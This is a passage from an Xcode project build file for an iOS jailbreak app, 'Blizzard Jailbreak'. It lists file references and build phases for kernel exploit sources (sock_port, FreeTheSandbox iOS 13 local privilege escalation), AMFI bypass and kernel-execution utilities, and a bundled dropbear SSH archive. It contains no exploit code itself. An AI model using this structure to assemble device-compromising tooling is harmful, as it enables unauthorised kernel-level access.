};\n\t\tD62CA1E324E1C7EA002E6756 /* patchfinder64.h */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.h; path = patchfinder64.h; sourceTree = \"<group>\"; };\n\t\tD62CA1E424E1C7EA002E6756 /* patchfinder64.m */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.objc; path = patchfinder64.m; sourceTree = \"<group>\"; };\n\t\tD62CA1E624E1C7F7002E6756 /* kexecute.c */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.c; path = kexecute.c; sourceTree = \"<group>\"; };\n\t\tD62CA1E724E1C7F7002E6756 /* kexecute.h */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.h; path = kexecute.h; sourceTree = \"<group>\"; };\n\t\tD62CA1E924E1C7FF002E6756 /* kernel_utils.h */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.h; path = kernel_utils.h; sourceTree = \"<group>\"; };\n\t\tD62CA1EA24E1C7FF002E6756 /* kernel_utils.m */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.objc; path = kernel_utils.m; sourceTree = \"<group>\"; };\n\t\tD62CA1EC24E1C83E002E6756 /* offsetof.c */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.c; path = offsetof.c; sourceTree = \"<group>\"; };\n\t\tD62CA1ED24E1C83E002E6756 /* offsetof.h */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.h; path = offsetof.h; sourceTree = \"<group>\"; };\n\t\tD62CA20A24E1D95F002E6756 /* kerneldec */ = {isa = PBXFileReference; lastKnownFileType = \"compiled.mach-o.executable\"; name = kerneldec; path = \"../jelbrekLib-master/kerneldec/kerneldec\"; sourceTree = \"<group>\"; };\n\t\tD63EDABF24E1989F009B305D /* blizzardJailbreak.m */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.c.objc; path = blizzardJailbreak.m; sourceTree = \"<group>\"; };\n\t\tD63EDAC024E1989F009B305D /* blizzardJailbreak.h */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.c.h; path = 
blizzardJailbreak.h; sourceTree = \"<group>\"; };\n\t\tD69C4C96256865BF001DE2BC /* IOKit.tbd */ = {isa = PBXFileReference; lastKnownFileType = \"sourcecode.text-based-dylib-definition\"; name = IOKit.tbd; path = ../ToolChain/IOKit.tbd; sourceTree = \"<group>\"; };\n\t\tD69C4C9825686627001DE2BC /* IOKit.tbd */ = {isa = PBXFileReference; lastKnownFileType = \"sourcecode.text-based-dylib-definition\"; name = IOKit.tbd; path = \"../ToolChain/Jailbreak Frameworks/IOKit.tbd\"; sourceTree = \"<group>\"; };\n\t\tD69C4C9D256866A2001DE2BC /* OSMessageNotification.h */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.h; name = OSMessageNotification.h; path = include/IOKit/OSMessageNotification.h; sourceTree = \"<group>\"; };\n\t\tD69C4CA225686884001DE2BC /* xpc.h */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.h; path = xpc.h; sourceTree = \"<group>\"; };\n\t\tD69C4CA325686884001DE2BC /* vnode.h */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.h; path = vnode.h; sourceTree = \"<group>\"; };\n\t\tD69C4CA425686894001DE2BC /* ios13_userspace_pac.c */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.c; path = ios13_userspace_pac.c; sourceTree = \"<group>\"; };\n\t\tD69C4CA525686894001DE2BC /* ios13_kernel_universal.c */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.c; path = ios13_kernel_universal.c; sourceTree = \"<group>\"; };\n\t\tD69C4CA625686894001DE2BC /* ios13_userspace.c */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.c; path = ios13_userspace.c; sourceTree = \"<group>\"; };\n\t\tD69C4CA725686894001DE2BC /* ios13_change_offsets.m */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.objc; path = ios13_change_offsets.m; sourceTree = \"<group>\"; };\n\t\tD69C4CA825686894001DE2BC /* xpc.h */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = 
sourcecode.c.h; name = xpc.h; path = \"../../../FreeTheSandbox_LPE_POC_13.7-main/ios13_app1/xpc.h\"; sourceTree = \"<group>\"; };\n\t\tD69C4CA925686894001DE2BC /* IOTypes.h */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.h; path = IOTypes.h; sourceTree = \"<group>\"; };\n\t\tD69C4CAA25686895001DE2BC /* libsnappy.c */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.c; path = libsnappy.c; sourceTree = \"<group>\"; };\n\t\tD69C4CAB25686895001DE2BC /* ios_7st_utils.m */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.objc; path = ios_7st_utils.m; sourceTree = \"<group>\"; };\n\t\tD69C4CAC25686895001DE2BC /* libsnappy.h */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.h; path = libsnappy.h; sourceTree = \"<group>\"; };\n\t\tD69C4CAD25686895001DE2BC /* vnode.h */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.h; name = vnode.h; path = \"../../../FreeTheSandbox_LPE_POC_13.7-main/ios13_app1/vnode.h\"; sourceTree = \"<group>\"; };\n\t\tD69C4CB5256868BB001DE2BC /* IOReturn.h */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.h; path = IOReturn.h; sourceTree = \"<group>\"; };\n\t\tD69C4CB6256868BB001DE2BC /* IOKitKeys.h */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.h; path = IOKitKeys.h; sourceTree = \"<group>\"; };\n\t\tD69C4CB7256868BB001DE2BC /* IOKitLib.h */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.h; path = IOKitLib.h; sourceTree = \"<group>\"; };\n\t\tD69C4CB8256868BB001DE2BC /* IOTypes.h */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.h; path = IOTypes.h; sourceTree = \"<group>\"; };\n\t\tD69C4CBB25686D0F001DE2BC /* freethesandbox.h */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.c.h; path = freethesandbox.h; sourceTree = \"<group>\"; };\n\t\tD6FFA56024E1A59A00CAC2E2 /* 
blizzardView.h */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.c.h; path = blizzardView.h; sourceTree = \"<group>\"; };\n\t\tD6FFA56124E1A59A00CAC2E2 /* blizzardView.m */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.c.objc; path = blizzardView.m; sourceTree = \"<group>\"; };\n/* End PBXFileReference section */\n\n/* Begin PBXFrameworksBuildPhase section */\n\t\t82F179E922DF4ED700231F8C /* Frameworks */ = {\n\t\t\tisa = PBXFrameworksBuildPhase;\n\t\t\tbuildActionMask = 2147483647;\n\t\t\tfiles = (\n\t\t\t\tD69C4C9925686628001DE2BC /* IOKit.tbd in Frameworks */,\n\t\t\t\tD613B74D24E2B2600069CA9B /* libMobileGestalt.tbd in Frameworks */,\n\t\t\t\tD613B74B24E2B2560069CA9B /* libcompression.tbd in Frameworks */,\n\t\t\t\tD613B74624E2B1E70069CA9B /* libimg4tool.a in Frameworks */,\n\t\t\t\tD613B74724E2B1E70069CA9B /* libmerged.a in Frameworks */,\n\t\t\t\tD613B74824E2B1E70069CA9B /* libplist.a in Frameworks */,\n\t\t\t\tD613B74924E2B1E70069CA9B /* libplist++.a in Frameworks */,\n\t\t\t\tD613B74524E2B1C20069CA9B /* liboffsetfinder64.a in Frameworks */,\n\t\t\t);\n\t\t\trunOnlyForDeploymentPostprocessing = 0;\n\t\t};\n\t\t82F17A0122DF4ED800231F8C /* Frameworks */ = {\n\t\t\tisa = PBXFrameworksBuildPhase;\n\t\t\tbuildActionMask = 2147483647;\n\t\t\tfiles = (\n\t\t\t);\n\t\t\trunOnlyForDeploymentPostprocessing = 0;\n\t\t};\n\t\t82F17A0C22DF4ED800231F8C /* Frameworks */ = {\n\t\t\tisa = PBXFrameworksBuildPhase;\n\t\t\tbuildActionMask = 2147483647;\n\t\t\tfiles = (\n\t\t\t);\n\t\t\trunOnlyForDeploymentPostprocessing = 0;\n\t\t};\n/* End PBXFrameworksBuildPhase section */\n\n/* Begin PBXGroup section */\n\t\t82F179E322DF4ED700231F8C = {\n\t\t\tisa = PBXGroup;\n\t\t\tchildren = (\n\t\t\t\tD69C4C9525686579001DE2BC /* Exploits */,\n\t\t\t\tD62BC51C24E4112300EC63D4 /* Base Binaries */,\n\t\t\t\tD613B73A24E2B13E0069CA9B /* Helper Libraries */,\n\t\t\t\tD613B71D24E2A68D0069CA9B /* APFS Utilities */,\n\t\t\t\tD613B71C24E2A6690069CA9B /* AMFI Utilities 
*/,\n\t\t\t\tD62CA1DF24E1C6FB002E6756 /* Kernel Utilities */,\n\t\t\t\tD62CA1DB24E1C660002E6756 /* PatchFinder */,\n\t\t\t\tD6FFA55F24E19E0900CAC2E2 /* Blizzard Jailbreak */,\n\t\t\t\t82F17A0722DF4ED800231F8C /* sock_port_tests */,\n\t\t\t\t82F17A1222DF4ED800231F8C /* sock_port_UITests */,\n\t\t\t\t82F179ED22DF4ED700231F8C /* Products */,\n\t\t\t\t82F17A2722DF57B700231F8C /* Frameworks */,\n\t\t\t);\n\t\t\tsourceTree = \"<group>\";\n\t\t};\n\t\t82F179ED22DF4ED700231F8C /* Products */ = {\n\t\t\tisa = PBXGroup;\n\t\t\tchildren = (\n\t\t\t\t82F179EC22DF4ED700231F8C /* Blizzard Jailbreak.app */,\n\t\t\t\t82F17A0422DF4ED800231F8C /* Blizzard JailbreakTests.xctest */,\n\t\t\t\t82F17A0F22DF4ED800231F8C /* Blizzard JailbreakUITests.xctest */,\n\t\t\t);\n\t\t\tname = Products;\n\t\t\tsourceTree = \"<group>\";\n\t\t};\n\t\t82F179EE22DF4ED700231F8C /* sock_port */ = {\n\t\t\tisa = PBXGroup;\n\t\t\tchildren = (\n\t\t\t\tD69C4C9D256866A2001DE2BC /* OSMessageNotification.h */,\n\t\t\t\t82F17A2122DF4EF100231F8C /* exploit.c */,\n\t\t\t\t82F17A2222DF4EF100231F8C /* exploit.h */,\n\t\t\t\t82F17A2422DF4F1C00231F8C /* exploit_utilities.c */,\n\t\t\t\t82F17A2522DF4F1C00231F8C /* exploit_utilities.h */,\n\t\t\t\t8288501022E07303005D10FC /* kernel_memory.c */,\n\t\t\t\t8288501122E07303005D10FC /* kernel_memory.h */,\n\t\t\t\t8288501422E07C14005D10FC /* offsets.h */,\n\t\t\t\t8288501322E07C14005D10FC /* offsets.m */,\n\t\t\t\tD62CA1EC24E1C83E002E6756 /* offsetof.c */,\n\t\t\t\tD62CA1ED24E1C83E002E6756 /* offsetof.h */,\n\t\t\t\t82E9B71422E24BAD0016AA39 /* iosurface.c */,\n\t\t\t\t82E9B71322E24BAC0016AA39 /* iosurface.h */,\n\t\t\t);\n\t\t\tpath = sock_port;\n\t\t\tsourceTree = \"<group>\";\n\t\t};\n\t\t82F17A0722DF4ED800231F8C /* sock_port_tests */ = {\n\t\t\tisa = PBXGroup;\n\t\t\tchildren = (\n\t\t\t\t82F17A0822DF4ED800231F8C /* socket_freeTests.m */,\n\t\t\t\t82F17A0A22DF4ED800231F8C /* Info.plist */,\n\t\t\t);\n\t\t\tpath = sock_port_tests;\n\t\t\tsourceTree = 
\"<group>\";\n\t\t};\n\t\t82F17A1222DF4ED800231F8C /* sock_port_UITests */ = {\n\t\t\tisa = PBXGroup;\n\t\t\tchildren = (\n\t\t\t\t82F17A1322DF4ED800231F8C /* socket_freeUITests.m */,\n\t\t\t\t82F17A1522DF4ED800231F8C /* Info.plist */,\n\t\t\t);\n\t\t\tpath = sock_port_UITests;\n\t\t\tsourceTree = \"<group>\";\n\t\t};\n\t\t82F17A2722DF57B700231F8C /* Frameworks */ = {\n\t\t\tisa = PBXGroup;\n\t\t\tchildren = (\n\t\t\t\tD69C4C96256865BF001DE2BC /* IOKit.tbd */,\n\t\t\t\tD69C4C9825686627001DE2BC /* IOKit.tbd */,\n\t\t\t\tD613B74C24E2B25F0069CA9B /* libMobileGestalt.tbd */,\n\t\t\t\tD613B74A24E2B2560069CA9B /* libcompression.tbd */,\n\t\t\t\tD613B72E24E2A7B70069CA9B /* libimg4tool.a */,\n\t\t\t\tD613B72D24E2A7B70069CA9B /* libmerged.a */,\n\t\t\t\tD613B72A24E2A7B70069CA9B /* liboffsetfinder64.a */,\n\t\t\t\tD613B72B24E2A7B70069CA9B /* libplist.a */,\n\t\t\t\tD613B72C24E2A7B70069CA9B /* libplist++.a */,\n\t\t\t\tD62CA20A24E1D95F002E6756 /* kerneldec */,\n\t\t\t\t82F17A2822DF57B700231F8C /* IOKit.tbd */,\n\t\t\t);\n\t\t\tname = Frameworks;\n\t\t\tsourceTree = \"<group>\";\n\t\t};\n\t\tD613B71C24E2A6690069CA9B /* AMFI Utilities */ = {\n\t\t\tisa = PBXGroup;\n\t\t\tchildren = (\n\t\t\t\tD613B75E24E2EEFD0069CA9B /* osobject.c */,\n\t\t\t\tD613B75F24E2EEFD0069CA9B /* osobject.h */,\n\t\t\t\tD613B75D24E2E8690069CA9B /* cs_blob.h */,\n\t\t\t\tD613B75224E2E8300069CA9B /* amfi_utils.h */,\n\t\t\t\tD613B75324E2E8300069CA9B /* amfi_utils.m */,\n\t\t\t\tD613B75524E2E8300069CA9B /* amfid_mem.h */,\n\t\t\t\tD613B75624E2E8300069CA9B /* amfid_mem.m */,\n\t\t\t\tD613B75124E2E82F0069CA9B /* amfid_tools.h */,\n\t\t\t\tD613B75424E2E8300069CA9B /* amfid_tools.m */,\n\t\t\t\tD613B75A24E2E8580069CA9B /* amfid.h */,\n\t\t\t\tD613B75B24E2E8580069CA9B /* amfid.m */,\n\t\t\t);\n\t\t\tpath = \"AMFI Utilities\";\n\t\t\tsourceTree = \"<group>\";\n\t\t};\n\t\tD613B71D24E2A68D0069CA9B /* APFS Utilities */ = {\n\t\t\tisa = PBXGroup;\n\t\t\tchildren = (\n\t\t\t\tD613B73724E2A8C40069CA9B /* IOKit.h 
*/,\n\t\t\t\tD613B72924E2A79F0069CA9B /* liboffsetfinder64.hpp */,\n\t\t\t\tD613B72624E2A76A0069CA9B /* offsetfinder.cpp */,\n\t\t\t\tD613B72424E2A76A0069CA9B /* rootfs_remount.m */,\n\t\t\t\tD613B72524E2A76A0069CA9B /* rootfs_remount.h */,\n\t\t\t\tD613B73624E2A8B00069CA9B /* snapshot_tools.h */,\n\t\t\t\tD613B73424E2A8AB0069CA9B /* snapshot_tools.c */,\n\t\t\t);\n\t\t\tpath = \"APFS Utilities\";\n\t\t\tsourceTree = \"<group>\";\n\t\t};\n\t\tD613B73A24E2B13E0069CA9B /* Helper Libraries */ = {\n\t\t\tisa = PBXGroup;\n\t\t\tchildren = (\n\t\t\t\tD613B73F24E2B1540069CA9B /* libimg4tool.a */,\n\t\t\t\tD613B73E24E2B1530069CA9B /* libmerged.a */,\n\t\t\t\tD613B73B24E2B1530069CA9B /* liboffsetfinder64.a */,\n\t\t\t\tD613B73C24E2B1530069CA9B /* libplist.a */,\n\t\t\t\tD613B73D24E2B1530069CA9B /* libplist++.a */,\n\t\t\t);\n\t\t\tpath = \"Helper Libraries\";\n\t\t\tsourceTree = \"<group>\";\n\t\t};\n\t\tD62BC51C24E4112300EC63D4 /* Base Binaries */ = {\n\t\t\tisa = PBXGroup;\n\t\t\tchildren = (\n\t\t\t\tD62BC51F24E41AF500EC63D4 /* basebins.tar */,\n\t\t\t\tD62BC52124E41F2500EC63D4 /* dropbear.tar */,\n\t\t\t\tD62BC51D24E4113200EC63D4 /* tar */,\n\t\t\t);\n\t\t\tpath = \"Base Binaries\";\n\t\t\tsourceTree = \"<group>\";\n\t\t};\n\t\tD62CA1DB24E1C660002E6756 /* PatchFinder */ = {\n\t\t\tisa = PBXGroup;\n\t\t\tchildren = (\n\t\t\t\tD62CA1E324E1C7EA002E6756 /* patchfinder64.h */,\n\t\t\t\tD62CA1E424E1C7EA002E6756 /* patchfinder64.m */,\n\t\t\t);\n\t\t\tpath = PatchFinder;\n\t\t\tsourceTree = \"<group>\";\n\t\t};\n\t\tD62CA1DF24E1C6FB002E6756 /* Kernel Utilities */ = {\n\t\t\tisa = PBXGroup;\n\t\t\tchildren = (\n\t\t\t\tD613B73824E2A99B0069CA9B /* system_reboot.h */,\n\t\t\t\tD62CA1E924E1C7FF002E6756 /* kernel_utils.h */,\n\t\t\t\tD62CA1EA24E1C7FF002E6756 /* kernel_utils.m */,\n\t\t\t\tD62CA1E624E1C7F7002E6756 /* kexecute.c */,\n\t\t\t\tD62CA1E724E1C7F7002E6756 /* kexecute.h */,\n\t\t\t\tD613B76424E2F2D30069CA9B /* kernSymbolication.c */,\n\t\t\t\tD613B76524E2F2D30069CA9B /* 
kernSymbolication.h */,\n\t\t\t\tD613B78124E2F9980069CA9B /* lzssdec.hpp */,\n\t\t\t\tD613B78024E2F9980069CA9B /* lzssdec.cpp */,\n\t\t\t);\n\t\t\tpath = \"Kernel Utilities\";\n\t\t\tsourceTree = \"<group>\";\n\t\t};\n\t\tD69C4C9525686579001DE2BC /* Exploits */ = {\n\t\t\tisa = PBXGroup;\n\t\t\tchildren = (\n\t\t\t\tD69C4CB4256868A8001DE2BC /* IOKit */,\n\t\t\t\tD69C4CA125686866001DE2BC /* FreeTheSandbox */,\n\t\t\t\t82F179EE22DF4ED700231F8C /* sock_port */,\n\t\t\t);\n\t\t\tpath = Exploits;\n\t\t\tsourceTree = \"<group>\";\n\t\t};\n\t\tD69C4CA125686866001DE2BC /* FreeTheSandbox */ = {\n\t\t\tisa = PBXGroup;\n\t\t\tchildren = (\n\t\t\t\tD69C4CAB25686895001DE2BC /* ios_7st_utils.m */,\n\t\t\t\tD69C4CA725686894001DE2BC /* ios13_change_offsets.m */,\n\t\t\t\tD69C4CA525686894001DE2BC /* ios13_kernel_universal.c */,\n\t\t\t\tD69C4CA425686894001DE2BC /* ios13_userspace_pac.c */,\n\t\t\t\tD69C4CA625686894001DE2BC /* ios13_userspace.c */,\n\t\t\t\tD69C4CBB25686D0F001DE2BC /* freethesandbox.h */,\n\t\t\t\tD69C4CA925686894001DE2BC /* IOTypes.h */,\n\t\t\t\tD69C4CAA25686895001DE2BC /* libsnappy.c */,\n\t\t\t\tD69C4CAC25686895001DE2BC /* libsnappy.h */,\n\t\t\t\tD69C4CAD25686895001DE2BC /* vnode.h */,\n\t\t\t\tD69C4CA825686894001DE2BC /* xpc.h */,\n\t\t\t\tD69C4CA325686884001DE2BC /* vnode.h */,\n\t\t\t\tD69C4CA225686884001DE2BC /* xpc.h */,\n\t\t\t);\n\t\t\tpath = FreeTheSandbox;\n\t\t\tsourceTree = \"<group>\";\n\t\t};\n\t\tD69C4CB4256868A8001DE2BC /* IOKit */ = {\n\t\t\tisa = PBXGroup;\n\t\t\tchildren = (\n\t\t\t\tD69C4CB6256868BB001DE2BC /* IOKitKeys.h */,\n\t\t\t\tD69C4CB7256868BB001DE2BC /* IOKitLib.h */,\n\t\t\t\tD69C4CB5256868BB001DE2BC /* IOReturn.h */,\n\t\t\t\tD69C4CB8256868BB001DE2BC /* IOTypes.h */,\n\t\t\t);\n\t\t\tpath = IOKit;\n\t\t\tsourceTree = \"<group>\";\n\t\t};\n\t\tD6FFA55F24E19E0900CAC2E2 /* Blizzard Jailbreak */ = {\n\t\t\tisa = PBXGroup;\n\t\t\tchildren = (\n\t\t\t\t82F179FD22DF4ED700231F8C /* Info.plist */,\n\t\t\t\t82F179EF22DF4ED700231F8C /* 
AppDelegate.h */,\n\t\t\t\t82F179F022DF4ED700231F8C /* AppDelegate.m */,\n\t\t\t\t82F179F822DF4ED700231F8C /* Assets.xcassets */,\n\t\t\t\t82F179FE22DF4ED700231F8C /* main.m */,\n\t\t\t\t82F179F522DF4ED700231F8C /* Main.storyboard */,\n\t\t\t\t82F179FA22DF4ED700231F8C /* LaunchScreen.storyboard */,\n\t\t\t\tD63EDAC024E1989F009B305D /* blizzardJailbreak.h */,\n\t\t\t\tD63EDABF24E1989F009B305D /* blizzardJailbreak.m */,\n\t\t\t\tD6FFA56024E1A59A00CAC2E2 /* blizzardView.h */,\n\t\t\t\tD6FFA56124E1A59A00CAC2E2 /* blizzardView.m */,\n\t\t\t\tD613B71924E217D90069CA9B /* BlizzardLog.h */,\n\t\t\t\tD613B71A24E217D90069CA9B /* BlizzardLog.m */,\n\t\t\t\tD613B74E24E2CD5E0069CA9B /* BlizzardSpawnerTools.c */,\n\t\t\t\tD613B74F24E2CD5E0069CA9B /* BlizzardSpawnerTools.h */,\n\t\t\t);\n\t\t\tpath = \"Blizzard Jailbreak\";\n\t\t\tsourceTree = \"<group>\";\n\t\t};\n/* End PBXGroup section */\n\n/* Begin PBXNativeTarget section */\n\t\t82F179EB22DF4ED700231F8C /* Blizzard Jailbreak */ = {\n\t\t\tisa = PBXNativeTarget;\n\t\t\tbuildConfigurationList = 82F17A1822DF4ED800231F8C /* Build configuration list for PBXNativeTarget \"Blizzard Jailbreak\" */;\n\t\t\tbuildPhases = (\n\t\t\t\t82F179E822DF4ED700231F8C /* Sources */,\n\t\t\t\t82F179E922DF4ED700231F8C /* Frameworks */,\n\t\t\t\t82F179EA22DF4ED700231F8C /* Resources */,\n\t\t\t);\n\t\t\tbuildRules = (\n\t\t\t);\n\t\t\tdependencies = (\n\t\t\t);\n\t\t\tname = \"Blizzard Jailbreak\";\n\t\t\tproductName = socket_free;\n\t\t\tproductReference = 82F179EC22DF4ED700231F8C /* Blizzard Jailbreak.app */;\n\t\t\tproductType = \"com.apple.product-type.application\";\n\t\t};\n\t\t82F17A0322DF4ED800231F8C /* Blizzard JailbreakTests */ = {\n\t\t\tisa = PBXNativeTarget;\n\t\t\tbuildConfigurationList = 82F17A1B22DF4ED800231F8C /* Build configuration list for PBXNativeTarget \"Blizzard JailbreakTests\" */;\n\t\t\tbuildPhases = (\n\t\t\t\t82F17A0022DF4ED800231F8C /* Sources */,\n\t\t\t\t82F17A0122DF4ED800231F8C /* Frameworks 
*/,\n\t\t\t\t82F17A0222DF4ED800231F8C /* Resources */,\n\t\t\t);\n\t\t\tbuildRules = (\n\t\t\t);\n\t\t\tdependencies = (\n\t\t\t\t82F17A0622DF4ED800231F8C /* PBXTargetDependency */,\n\t\t\t);\n\t\t\tname = \"Blizzard JailbreakTests\";\n\t\t\tproductName = socket_freeTests;\n\t\t\tproductReference = 82F17A0422DF4ED800231F8C /* Blizzard JailbreakTests.xctest */;\n\t\t\tproductType = \"com.apple.product-type.bundle.unit-test\";\n\t\t};\n\t\t82F17A0E22DF4ED800231F8C /* Blizzard JailbreakUITests */ = {\n\t\t\tisa = PBXNativeTarget;\n\t\t\tbuildConfigurationList = 82F17A1E22DF4ED800231F8C /* Build configuration list for PBXNativeTarget \"Blizzard JailbreakUITests\" */;\n\t\t\tbuildPhases = (\n\t\t\t\t82F17A0B22DF4ED800231F8C /* Sources */,\n\t\t\t\t82F17A0C22DF4ED800231F8C /* Frameworks */,\n\t\t\t\t82F17A0D22DF4ED800231F8C /* Resources */,\n\t\t\t);\n\t\t\tbuildRules = (\n\t\t\t);\n\t\t\tdependencies = (\n\t\t\t\t82F17A1122DF4ED800231F8C /* PBXTargetDependency */,\n\t\t\t);\n\t\t\tname = \"Blizzard JailbreakUITests\";\n\t\t\tproductName = socket_freeUITests;\n\t\t\tproductReference = 82F17A0F22DF4ED800231F8C /* Blizzard JailbreakUITests.xctest */;\n\t\t\tproductType = \"com.apple.product-type.bundle.ui-testing\";\n\t\t};\n/* End PBXNativeTarget section */\n\n/* Begin PBXProject section */\n\t\t82F179E422DF4ED700231F8C /* Project object */ = {\n\t\t\tisa = PBXProject;\n\t\t\tattributes = {\n\t\t\t\tLastUpgradeCheck = 1010;\n\t\t\t\tORGANIZATIONNAME = GeoSn0w;\n\t\t\t\tTargetAttributes = {\n\t\t\t\t\t82F179EB22DF4ED700231F8C = {\n\t\t\t\t\t\tCreatedOnToolsVersion = 9.2;\n\t\t\t\t\t\tProvisioningStyle = Automatic;\n\t\t\t\t\t};\n\t\t\t\t\t82F17A0322DF4ED800231F8C = {\n\t\t\t\t\t\tCreatedOnToolsVersion = 9.2;\n\t\t\t\t\t\tProvisioningStyle = Automatic;\n\t\t\t\t\t\tTestTargetID = 82F179EB22DF4ED700231F8C;\n\t\t\t\t\t};\n\t\t\t\t\t82F17A0E22DF4ED800231F8C = {\n\t\t\t\t\t\tCreatedOnToolsVersion = 9.2;\n\t\t\t\t\t\tProvisioningStyle = Automatic;\n\t\t\t\t\t\tTestTargetID = 
82F179EB22DF4ED700231F8C;\n\t\t\t\t\t};\n\t\t\t\t};\n\t\t\t};\n\t\t\tbuildConfigurationList = 82F179E722DF4ED700231F8C /* Build configuration list for PBXProject \"Blizzard Jailbreak\" */;\n\t\t\tcompatibilityVersion = \"Xcode 8.0\";\n\t\t\tdevelopmentRegion = en;\n\t\t\thasScannedForEncodings = 0;\n\t\t\tknownRegions = (\n\t\t\t\ten,\n\t\t\t\tBase,\n\t\t\t);\n\t\t\tmainGroup = 82F179E322DF4ED700231F8C;\n\t\t\tproductRefGroup = 82F179ED22DF4ED700231F8C /* Products */;\n\t\t\tprojectDirPath = \"\";\n\t\t\tprojectRoot = \"\";\n\t\t\ttargets = (\n\t\t\t\t82F179EB22DF4ED700231F8C /* Blizzard Jailbreak */,\n\t\t\t\t82F17A0322DF4ED800231F8C /* Blizzard JailbreakTests */,\n\t\t\t\t82F17A0E22DF4ED800231F8C /* Blizzard JailbreakUITests */,\n\t\t\t);\n\t\t};\n/* End PBXProject section */\n\n/* Begin PBXResourcesBuildPhase section */\n\t\t82F179EA22DF4ED700231F8C /* Resources */ = {\n\t\t\tisa = PBXResourcesBuildPhase;\n\t\t\tbuildActionMask = 2147483647;\n\t\t\tfiles = (\n\t\t\t\t82F179FC22DF4ED700231F8C /* LaunchScreen.storyboard in Resources */,\n\t\t\t\t82F179F922DF4ED700231F8C /* Assets.xcassets in Resources */,\n\t\t\t\tD62BC51E24E4113200EC63D4 /* tar in Resources */,\n\t\t\t\tD62BC52024E41AF500EC63D4 /* basebins.tar in Resources */,\n\t\t\t\tD62BC52224E41F2500EC63D4 /* dropbear.tar in Resources */,\n\t\t\t\t82F179F722DF4ED700231F8C /* Main.storyboard in Resources */,\n\t\t\t);\n\t\t\trunOnlyForDeploymentPostprocessing = 0;\n\t\t};\n\t\t82F17A0222DF4ED800231F8C /* Resources */ = {\n\t\t\tisa = PBXResourcesBuildPhase;\n\t\t\tbuildActionMask = 2147483647;\n\t\t\tfiles = (\n\t\t\t);\n\t\t\trunOnlyForDeploymentPostprocessing = 0;\n\t\t};\n\t\t82F17A0D22DF4ED800231F8C /* Resources */ = {\n\t\t\tisa = PBXResourcesBuildPhase;\n\t\t\tbuildActionMask = 2147483647;\n\t\t\tfiles = (\n\t\t\t);\n\t\t\trunOnlyForDeploymentPostprocessing = 0;\n\t\t};\n/* End PBXResourcesBuildPhase section */\n\n/* Begin PBXSourcesBuildPhase section */\n\t\t82F179E822DF4ED700231F8C /* Sources */ = 
{\n\t\t\tisa = PBXSourcesBuildPhase;\n\t\t\tbuildActionMask = 2147483647;\n\t\t\tfiles = (\n\t\t\t\t82F17A2622DF4F1C00231F8C /* exploit_utilities.c in Sources */,\n\t\t\t\tD613B75724E2E8300069CA9B /* amfi_utils.m in Sources */,\n\t\t\t\tD6FFA56224E1A59A00CAC2E2 /* blizzardView.m in Sources */,\n\t\t\t\tD62CA1EB24E1C7FF002E6756 /* kernel_utils.m in Sources */,\n\t\t\t\tD69C4CB225686895001DE2BC /* libsnappy.c in Sources */,\n\t\t\t\tD69C4CAF25686895001DE2BC /* ios13_kernel_universal.c in Sources */,\n\t\t\t\tD69C4CAE25686895001DE2BC /* ios13_userspace_pac.c in Sources */,\n\t\t\t\tD613B78224E2F9980069CA9B /* lzssdec.cpp in Sources */,\n\t\t\t\t82F179FF22DF4ED700231F8C /* main.m in Sources */,\n\t\t\t\tD613B75824E2E8300069CA9B /* amfid_tools.m in Sources */,\n\t\t\t\tD613B72824E2A76A0069CA9B /* offsetfinder.cpp in Sources */,\n\t\t\t\tD613B73524E2A8AB0069CA9B /* snapshot_tools.c in Sources */,\n\t\t\t\tD613B75024E2CD5E0069CA9B /* BlizzardSpawnerTools.c in Sources */,\n\t\t\t\tD613B71B24E217D90069CA9B /* BlizzardLog.m in Sources */,\n\t\t\t\tD62CA1EE24E1C83F002E6756 /* offsetof.c in Sources */,\n\t\t\t\t82F179F122DF4ED700231F8C /* AppDelegate.m in Sources */,\n\t\t\t\t82F17A2322DF4EF100231F8C /* exploit.c in Sources */,\n\t\t\t\tD613B75C24E2E8590069CA9B /* amfid.m in Sources */,\n\t\t\t\t82E9B71522E24BAD0016AA39 /* iosurface.c in Sources */,\n\t\t\t\tD613B75924E2E8300069CA9B /* amfid_mem.m in Sources */,\n\t\t\t\tD62CA1E824E1C7F7002E6756 /* kexecute.c in Sources */,\n\t\t\t\tD69C4CB125686895001DE2BC /* ios13_change_offsets.m in Sources */,\n\t\t\t\tD613B76624E2F2D30069CA9B /* kernSymbolication.c in Sources */,\n\t\t\t\tD613B76024E2EEFD0069CA9B /* osobject.c in Sources 